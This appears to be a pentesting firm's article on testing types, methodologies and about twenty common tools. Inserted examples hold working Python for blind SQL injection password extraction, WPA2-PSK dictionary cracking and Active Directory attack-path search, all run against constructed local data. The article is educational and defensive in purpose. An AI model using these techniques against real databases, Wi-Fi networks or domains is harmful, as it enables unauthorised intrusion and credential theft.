At a time when data breaches and cyber attacks have become commonplace, being cyber resilient and prepared for attacks is the new norm.
Organisations need to protect their data and assets while maintaining the privacy of their employees and customers. This is only possible when organisations take appropriate measures, use penetration testing tools and services to analyse and improve their current security posture, and invest in their cyber security.
Robert Mueller (FBI Director, 2012) has rightly said, “There are only two types of companies: Those that have been hacked and those that will be. Even that is merging into one category: those that have been hacked, and will be again.”
In light of the above statement, it is evident that cybercriminals will stop at nothing to intrude on networks, compromise systems and exfiltrate data.
Many companies (Cyphere among them) provide security solutions and services to other organisations, helping them improve their cyber security processes; for example, penetration testing services (or pentesting, in short) to assess and analyse risks to their assets.
What is penetration testing?
Penetration testing (or pentesting) is a simulated cyberattack in which hackers (ethical ones, of course) are hired to identify vulnerabilities and then carry out the same attacks an actual attacker would once those vulnerabilities are found.
Often, these engagements will have a set of objectives used to determine the difference between a successful pen test and an unsuccessful one. Depending on the assets in scope, pen testing may target cloud environments (e.g. GCP pentesting), on-premises infrastructure, or asset categories such as web applications, APIs, thick clients and mobile devices.
Why do you need penetration testing?
The main objective of carrying out a penetration test is to identify weaknesses and vulnerabilities in applications, networks and systems and then patch them accordingly before a real cyber-attack happens.
What are the types of penetration testing?
Penetration testing is usually categorised into three types. Those being:
1. Black box testing
In this type of testing, only the scope is given to the security analyst; no knowledge of the infrastructure, applications, credentials etc. is provided.
2. White box testing
In this type of testing, the security analyst is given full insight into the infrastructure, applications, programming languages, source code, credentials etc.
3. Gray box testing
In this type of pentest, partial knowledge about the infrastructure and assets (for example, a low-privileged user account and an architecture overview) is provided to the security analyst along with the scope.
A pentest may also be carried out according to the following two types:
1. Internal pentesting
Depending on the criticality and confidentiality of the organisational assets, organisations may ask for internal pentesting, where the internal networks and internal (or in-house developed) applications are made available to the penetration tester. For instance, container security controls and private cloud assets owned by the customer are tested during this type of engagement.
2. External pentesting
In this type of penetration test, the penetration tester is provided with the public-facing assets of an organisation and asked to carry out pentesting against them. This includes port scanning (ports such as 443, 25 and 80 and, ideally, the full range of 65,535 TCP ports), service fingerprinting, vulnerability scanning and analysis, and the pen test itself (assessing and exploiting any exploitable risks).
What are the top 5 penetration testing techniques?
Around the globe, most penetration testing activities revolve around the following five methodologies or standards:
1. Open Source Security Testing Methodology Manual (OSSTMM)
OSSTMM (maintained by ISECOM) is a standardised methodology for security testing, so that results are consistent and comparable regardless of which security firm an organisation employs.
2. Open Web Application Security Project (OWASP)
OWASP is an open, community-driven non-profit focused on improving the security of web applications and services; its guidance (such as the OWASP Testing Guide and the OWASP Top 10) now also covers mobile, API and secure coding practices.
3. National Institute of Standards and Technology (NIST)
NIST's Special Publication 800 series is a set of information security standards and guidelines. SP 800-115 (Technical Guide to Information Security Testing and Assessment) describes the general penetration testing process and provides recommendations for analysing test results and developing measures to reduce risk.
4. Penetration Testing Execution Standard (PTES)
PTES offers recommendations for performing a basic pentest and several more advanced test variants for organisations with advanced security requirements. One of the advantages of PTES is that it gives a detailed description of the goals and expected results of a pentest, from pre-engagement through to reporting.
5. Information System Security Assessment Framework (ISSAF)
ISSAF describes the appropriate pen-testing tools, how to use them, and what results testers can expect under various circumstances.
What is needed for Pentesting? What makes a good pen tester?
A good penetration tester has a curious mindset, is tech-savvy and has a genuine passion for information security. They should also understand how applications and operating systems work, have solid networking fundamentals and a broad grounding in IT and computer science.
Penetration testing tools
In the sections above we discussed what penetration testing is and why it is essential. In this part, we will discuss a few penetration testing tools that are known and used worldwide; every aspiring penetration tester should know how to use these tools to their fullest potential.
We will not go deep into the functionality of each tool, just an overall review and its main features. For physical security, you can look at physical security attack methods and tools here.
Operating systems as tools for penetration testing
1. Kali Linux
The most popular OS used for penetration testing is Kali Linux. Developed and maintained by Offensive Security (now OffSec), Kali Linux is a Debian-based Linux distribution with almost all the tools and resources penetration testers need to carry out their activities.
It contains many tools categorised according to the penetration testing techniques, for example, reconnaissance, scanning, exploitation etc.
It also ships wordlists for brute-forcing credentials and for fuzzing applications to trigger unintended behaviour.
For anyone proficient in Linux, Kali is usually the first go-to operating system when doing a penetration test.
2. Parrot OS
Developed by ParrotSec, Parrot OS is another Linux-based operating system for penetration testers, containing most of the tools and resources pentesters require. It is lighter and needs fewer resources than Kali Linux.
As for tooling, it has almost all the tools included in Kali plus some additional ones.
3. Commando VM
Developed and maintained by FireEye (now Mandiant), Commando VM is, as its name suggests, a Windows-based virtual machine build for offensive security operations. It does not support macOS.
Commando VM is more focused on the red teaming side of pentesting than on conventional pentesting, and has the tools a red teamer needs to carry out red team activities successfully.
Commando VM tools include PowerShell-based Active Directory and Azure Active Directory reconnaissance, enumeration and exploitation tools, antivirus evasion tools and scripts, and much more.
The complete list of tools included in the Commando VM and the installation instructions can be found here.
4. Android Tamer
Android Tamer is yet another Linux-based pentesting operating system, but aimed at Android applications. It has the tools and resources required to test an Android application for vulnerabilities, decompile it and look through the code for misconfigurations, sensitive data exposure etc.
Android Tamer allows security professionals to work on many Android security-related tasks, ranging from malware analysis and penetration testing to reverse engineering.
Web penetration testing tools
5. Netsparker web vulnerability scanner
Netsparker (since rebranded as Invicti) is a Dynamic Application Security Testing (DAST) tool that scans web applications for vulnerabilities, misconfigurations and missing updates or patches, and generates a comprehensive report.
It also includes Interactive Application Security Testing (IAST) capabilities, making it a versatile vulnerability scanner.
Netsparker can identify most of the OWASP Top 10 web and API vulnerability classes.
It is straightforward to set up and configure and is a paid pen-testing tool with two editions: (i) Netsparker Standard, a standalone Windows application, and (ii) Netsparker Enterprise, a web-based application for teams and multiple users.
6. Acunetix web vulnerability scanner
Acunetix is a fully automated web vulnerability scanner that detects and reports many web application vulnerabilities, including all variants of SQL injection and cross-site scripting (XSS).
It complements the role of a penetration tester by automating tasks that can take hours to test manually, delivering accurate results with few false positives at speed.
It includes manual testing tools for penetration testers as well.
It is fast and scalable, able to crawl hundreds of thousands of pages without interruption, integrates with popular WAFs and issue trackers to support the SDLC, and is available both as an on-premises and a cloud-based solution.
7. WPScan
A very large share of websites on the internet are built on WordPress, the most widely used content management system. WordPress provides a basic site layout plus many themes and plugins for additional functionality and customisation.
Naturally, these themes and plugins carry vulnerabilities of their own. WPScan is a pen-testing tool that scans and tests a WordPress site for such vulnerabilities.
It can detect old and vulnerable plugins, themes, and backup or configuration files that may have been left accessible on the public internet by mistake, and gives you a friendly and comprehensive overview of your WordPress website's current security state.
It comes pre-installed in Kali Linux and is a free-to-use vulnerability scanner with a low number of false positives.
8. Vooki
Developed by VegaBird Technologies, Vooki is yet another Dynamic Application Security Testing (DAST) tool, capable of scanning both web applications and REST APIs for vulnerabilities and generating a comprehensive report based on the findings.
It can perform more than 7,000 security checks, making it one of the more thorough tools in its class.
It is a freemium penetration testing tool with both free and paid versions. While the free version is limited to 3,500 security checks, it is still a good vulnerability scanner with a low false-positive ratio.
It also includes a proxy capable of intercepting web traffic and modifying requests sent to the web application, to support manual testing.
9. Burp suite
When talking about web vulnerabilities, the most famous name in the web pentesting market is PortSwigger's Burp Suite.
Burp Suite is an intercepting proxy: it captures web application traffic and lets the tester modify requests sent to, and responses received from, the application in order to test for a wide range of web vulnerabilities.
While it is primarily a manual testing tool, it includes a scanner and extensions (BApps) that automate tasks and perform some testing automatically, making the pentester's job a bit easier.
It has a low false-positive ratio and includes features such as replaying requests (Repeater), brute-forcing and fuzzing (Intruder) and detecting weaknesses in session tokens (Sequencer).
It also includes a built-in browser, so almost no configuration is required on the user's end.
Burp Suite is a freemium tool: the Community Edition is free, while the Professional edition is licensed per user per year ($399 at the time of writing).
10. OWASP zed attack proxy (ZAP)
OWASP's Zed Attack Proxy (ZAP) is an open-source web application scanner and intercepting proxy.
OWASP ZAP offers features similar to Burp Suite. It is completely free and open-source, making it a more accessible and cheaper pen-testing tool to deploy at scale, and it can also be run headless in CI pipelines.
11. SQLMap
When it comes to testing and exploiting SQL injection vulnerabilities, SQLMap is probably the best pen-testing tool out there.
It can test for almost all variants of SQL injection (boolean-based blind, time-based blind, error-based, UNION-based and stacked queries) and, upon successful exploitation, enumerate and exfiltrate data from the database.
In addition to SQL injection, it includes several Web Application Firewall (WAF) bypass tamper scripts and is an entirely free-to-use, open-source tool.
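To make concrete what SQLMap automates, here is an added example (not code from the original article or from the SQLMap project) of the boolean-based blind technique against a constructed SQLite database: the injectable endpoint only reveals whether any row matched, yet that single bit is enough to recover a password one character at a time by binary search, which is exactly how SQLMap's boolean-based blind mode works. The hardened, parameterised version of the same lookup is shown beside it; all table, column and user names are assumptions for the example.

```python
import sqlite3


def build_db():
    """Constructed sample database standing in for the target's backend."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    con.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "S3cret!"), (2, "alice", "wonderland")],
    )
    con.commit()
    return con


def vulnerable_lookup(con, username):
    """The injectable endpoint: user input is concatenated straight into SQL.
    Returns True if any row matched, i.e. a yes/no oracle such as a
    'welcome back' page versus a 'no such user' page."""
    sql = f"SELECT id FROM users WHERE username = '{username}'"
    return con.execute(sql).fetchone() is not None


def safe_lookup(con, username):
    """Hardened form: a parameterised query, so input is never parsed as SQL."""
    sql = "SELECT id FROM users WHERE username = ?"
    return con.execute(sql, (username,)).fetchone() is not None


def ask(con, condition):
    """Inject a boolean condition through the vulnerable endpoint. The '--'
    comments out the closing quote the application appends."""
    payload = f"x' OR ({condition}) --"
    return vulnerable_lookup(con, payload)


def blind_extract(con, target_sql, max_len=32):
    """Recover the string returned by target_sql using only the yes/no oracle:
    for each position, binary-search the character's code point (0..127)."""
    result = ""
    for pos in range(1, max_len + 1):
        # Stop once the string has no character at this position.
        if not ask(con, f"length(({target_sql})) >= {pos}"):
            break
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if ask(con, f"unicode(substr(({target_sql}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


if __name__ == "__main__":
    con = build_db()
    print("vulnerable, tautology:", vulnerable_lookup(con, "x' OR 1=1 --"))
    print("parameterised, same input:", safe_lookup(con, "x' OR 1=1 --"))
    secret = blind_extract(con, "SELECT password FROM users WHERE username='admin'")
    print("extracted admin password:", secret)
```

Each character costs about eight oracle queries, which is why SQLMap's boolean-based and time-based modes are noticeably slower than UNION-based extraction and why their request volume is so visible in web server logs.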
12. Nikto
Nikto is a very noisy (it makes no attempt at stealth) open-source web server scanner that performs comprehensive tests against web servers, including checks for more than 6,500 potentially dangerous files and programs, outdated server versions, version-specific problems on over 270 server types, and a number of misconfiguration checks.
It is best used to test web servers for missing patches, misconfigurations and exposed files, and, because it is so loud, to confirm that an organisation's IDS/IPS and SOC/SIEM are working and generating alerts as expected.
13. Browser exploitation framework
The Browser Exploitation Framework (BeEF) is a pentesting framework focusing on client-side attacks, explicitly targeting users’ web browsers.
BeEF hooks one or more web browsers (typically via a JavaScript payload delivered through XSS or a phishing page) and uses them as beachheads to launch directed command modules and further attacks against the system from within the browser context.
Each browser is likely to be within a different security context, and each context may provide a set of unique attack vectors.
Network/Infrastructure penetration testing tools
14. Network mapper (Nmap/Zenmap)
When talking about penetration tests, the first and most popular pen-testing tool that comes to mind is the Network Mapper (or Nmap, for short).
Nmap started as a port scanner but is now a full network scanner, and it also ships scripts that test for some vulnerabilities, including ones in web applications.
It can detect open ports, the services running on those ports and their versions, the target operating system, etc.
What makes Nmap stand out from other network and port scanners is its scripting engine, appropriately called the Nmap Scripting Engine (NSE).
NSE includes a large number of scripts used to test the open ports and detected services for vulnerabilities, in some cases going as far as exploitation: for example, http-sql-injection probes web forms for SQL injection, and mysql-brute brute-forces logins on an exposed MySQL port.
15. Aircrack-ng
Aircrack-ng is a wireless (WiFi) security pentesting suite that assesses wireless networks by capturing packets (including WPA handshakes), exporting them to capture or text files for analysis, and attacking the protocol directly.
It focuses on different areas of WiFi security:
- Monitoring: packet capture and export of data to text files for further processing by third-party tools.
- Attacking: replay attacks, deauthentication, fake access points and more via packet injection.
- Testing: checking WiFi cards and driver capabilities (capture and injection).
- Cracking: WEP and WPA/WPA2-PSK.
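The WPA-PSK cracking step above is an offline dictionary attack against a captured four-way handshake, and it is worth seeing why it works and why it is slow. The following is an added example (not code from the original article or from the Aircrack-ng project) that derives the PMK from a candidate passphrase with PBKDF2-HMAC-SHA1 (4096 iterations, as the standard specifies), expands it into the PTK with the 802.11i PRF, and checks the candidate by recomputing the WPA2 EAPOL key MIC with the KCK. The handshake itself is constructed in the script from a known passphrase so the example runs offline; the MAC addresses, nonces, SSID and the simplified EAPOL frame body are all assumptions for the example.

```python
import hashlib
import hmac


def wpa2_pmk(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes).
    The 4096 iterations are what make the dictionary attack CPU-bound."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def wpa2_ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PRF-512 from IEEE 802.11i: expands the PMK into the 64-byte PTK using
    the sorted MAC addresses and nonces from the handshake."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    ptk = b""
    for i in range(4):
        ptk += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return ptk[:64]


def eapol_mic(kck, eapol_frame):
    """WPA2 (CCMP) key MIC: HMAC-SHA1 over the EAPOL-Key frame with the MIC
    field zeroed, truncated to 16 bytes. KCK is the first 16 bytes of the PTK."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def crack_wpa_psk(handshake, wordlist):
    """Return the first passphrase whose derived KCK reproduces the captured
    MIC, or None if the wordlist is exhausted."""
    for candidate in wordlist:
        pmk = wpa2_pmk(candidate, handshake["ssid"])
        ptk = wpa2_ptk(pmk, handshake["ap_mac"], handshake["sta_mac"],
                       handshake["anonce"], handshake["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], handshake["eapol"]),
                               handshake["mic"]):
            return candidate
    return None


def make_constructed_handshake(passphrase, ssid="CorpWiFi"):
    """Constructed stand-in for a captured handshake: builds message 2 of the
    four-way handshake the way a station would, with the real MIC filled in.
    The EAPOL body is simplified; only its MIC field being zeroed matters."""
    ap_mac = bytes.fromhex("aabbccddeeff")
    sta_mac = bytes.fromhex("001122334455")
    anonce = bytes(range(32))
    snonce = bytes(range(32, 64))
    eapol = b"\x01\x03\x00\x75\x02\x01\x0a\x00\x10" + snonce + b"\x00" * 80
    pmk = wpa2_pmk(passphrase, ssid)
    ptk = wpa2_ptk(pmk, ap_mac, sta_mac, anonce, snonce)
    return {
        "ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac,
        "anonce": anonce, "snonce": snonce, "eapol": eapol,
        "mic": eapol_mic(ptk[:16], eapol),
    }


if __name__ == "__main__":
    hs = make_constructed_handshake("Summer2024!")
    print("recovered:", crack_wpa_psk(hs, ["password", "letmein", "Summer2024!"]))
```

Because every candidate costs 4096 HMAC-SHA1 rounds plus the PTK expansion, throughput on a CPU is only a few thousand guesses per second; this is why tools pre-compute PMKs per SSID or offload the PBKDF2 step to GPUs, and why a long random passphrase (not just a non-dictionary one) is the real defence.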
16. Nessus
As an infrastructure auditing tool, pentesters use Nessus (by Tenable) to check the overall security posture of a network, web application or system and to find the low-hanging fruit.
It has a very large plugin database of vulnerability checks that is updated very frequently.
It includes a port scanner capable of service and version detection, a web application scanning plugin for potential vulnerabilities, and compliance audits that read application and system configuration and report misconfigurations.
It is also a freemium tool: Nessus Essentials is the free version (limited to 16 IP addresses), while the paid version is Nessus Professional.
17. Wireshark
Wireshark is the go-to network communication and packet analysis tool, popular for exposing fine-grained detail about network protocols, packet contents, the cryptographic suites in use, etc.
Wireshark is extremely useful for spotting network-level cryptographic issues (cleartext protocols, weak TLS cipher suites, self-signed certificates) and for analysing traffic captured during MitM attacks as part of reconnaissance in a red team operation.
It can capture both wired and wireless traffic and hence is a robust network identification, enumeration and recon tool.
18. BloodHound
BloodHound uses graph theory to map out an Active Directory environment and then helps identify attack paths for moving laterally within the domain or escalating privileges.
The data is fed into BloodHound's graph database by data collectors, or ingestors, known as SharpHound. The SharpHound collector is run inside an Active Directory domain, and the result is a ZIP file containing the collected information about the domain (users, groups, computers, sessions, ACLs and trusts).
The ZIP is then uploaded into the BloodHound GUI, and a comprehensive map of the entire AD domain is presented.
Both red teams and blue teams can use BloodHound. Red teams use it to map out the domain environment, identify high-value targets, check for AD misconfigurations and identify potential attack paths.
Blue teams can use BloodHound to find those same attack paths first and implement a suitable fix, such as removing an unnecessary group membership or local admin right.
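What BloodHound does under the hood is a shortest-path search over a directed graph of AD relationships. The following added example (not code from the original article or from the BloodHound project) builds a small constructed edge list in the spirit of SharpHound's output, finds the shortest path from a low-privileged user to Domain Admins with breadth-first search, and then shows the blue-team use: remove one edge (a local admin right) and confirm the path is gone. All principal and computer names and the edge set are assumptions for the example; the edge names (MemberOf, AdminTo, HasSession, CanRDP) follow BloodHound's vocabulary but their semantics here are simplified.

```python
from collections import deque

# Constructed edge list, (source, edge_type, target), loosely modelled on
# what SharpHound collects. Simplified semantics:
#   MemberOf   : source is a member of group target
#   AdminTo    : source has local admin rights on computer target
#   HasSession : computer source has a logged-on session for user target
#   CanRDP     : source may RDP to computer target
EDGES = [
    ("ALICE@CORP.LOCAL", "MemberOf", "HELPDESK@CORP.LOCAL"),
    ("ALICE@CORP.LOCAL", "MemberOf", "DOMAIN USERS@CORP.LOCAL"),
    ("HELPDESK@CORP.LOCAL", "AdminTo", "WS01.CORP.LOCAL"),
    ("WS01.CORP.LOCAL", "HasSession", "BOB@CORP.LOCAL"),
    ("BOB@CORP.LOCAL", "MemberOf", "DOMAIN ADMINS@CORP.LOCAL"),
    ("DOMAIN USERS@CORP.LOCAL", "CanRDP", "WS02.CORP.LOCAL"),
]


def build_graph(edges):
    """Adjacency list: node -> [(edge_type, neighbour), ...]."""
    graph = {}
    for src, rel, dst in edges:
        graph.setdefault(src, []).append((rel, dst))
    return graph


def shortest_attack_path(edges, start, target):
    """Breadth-first search for the fewest-hop path from start to target.
    Returns a list of (node, edge_type, node) hops, or None if unreachable."""
    graph = build_graph(edges)
    parent = {start: None}          # node -> (previous node, edge_type)
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == target:
            path = []
            while parent[node] is not None:
                prev, rel = parent[node]
                path.append((prev, rel, node))
                node = prev
            return list(reversed(path))
        for rel, nxt in graph.get(node, []):
            if nxt not in parent:   # first visit is the shortest in BFS
                parent[nxt] = (node, rel)
                queue.append(nxt)
    return None


def without_edge(edges, edge):
    """Blue-team 'what if': the edge list with one relationship removed."""
    return [e for e in edges if e != edge]


if __name__ == "__main__":
    start, target = "ALICE@CORP.LOCAL", "DOMAIN ADMINS@CORP.LOCAL"
    path = shortest_attack_path(EDGES, start, target)
    for src, rel, dst in path:
        print(f"{src} -[{rel}]-> {dst}")
    fixed = without_edge(EDGES, ("HELPDESK@CORP.LOCAL", "AdminTo", "WS01.CORP.LOCAL"))
    print("path after removing helpdesk local admin:",
          shortest_attack_path(fixed, start, target))
```

In a real environment the graph has hundreds of thousands of edges and many edge types, which is why BloodHound stores it in a graph database and exposes Cypher queries, but the question it answers is the same one this search answers.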
Penetration testing frameworks
19. Metasploit framework
If you are looking for a complete penetration testing framework, the Metasploit Framework by Rapid7 is the obvious choice.
It comes with a large collection of exploits, auxiliary modules, scanners and payloads, and is the most widely used exploitation framework in the world.
Whether it's scanning for a vulnerability, enumerating a network, exploiting a weakness, obtaining command execution or generating payloads (via msfvenom), the Metasploit Framework provides modules that automate these tasks for you.
While it includes many pre-built exploit modules, you can also add your own custom exploit modules to it.
The Metasploit Framework covers all the phases of an attack, from the beginning (reconnaissance and scanning) through exploitation to post-exploitation and the action-on-objectives phase.
20. Mobile security framework (MobSF)
Just like the Metasploit Framework, the Mobile Security Framework (MobSF) is an all-in-one mobile testing framework supporting both Android (APK) and iOS (IPA) applications, as well as zipped source code.
It is an open-source framework capable of performing end-to-end security testing, malware analysis, and static and dynamic analysis of mobile applications.
It can also generate reports that can be exported in PDF format for review outside the application or shared with other teams. These reports contain everything from whether the binary is properly signed and how, to the permissions and functionality the application will use once installed on a device.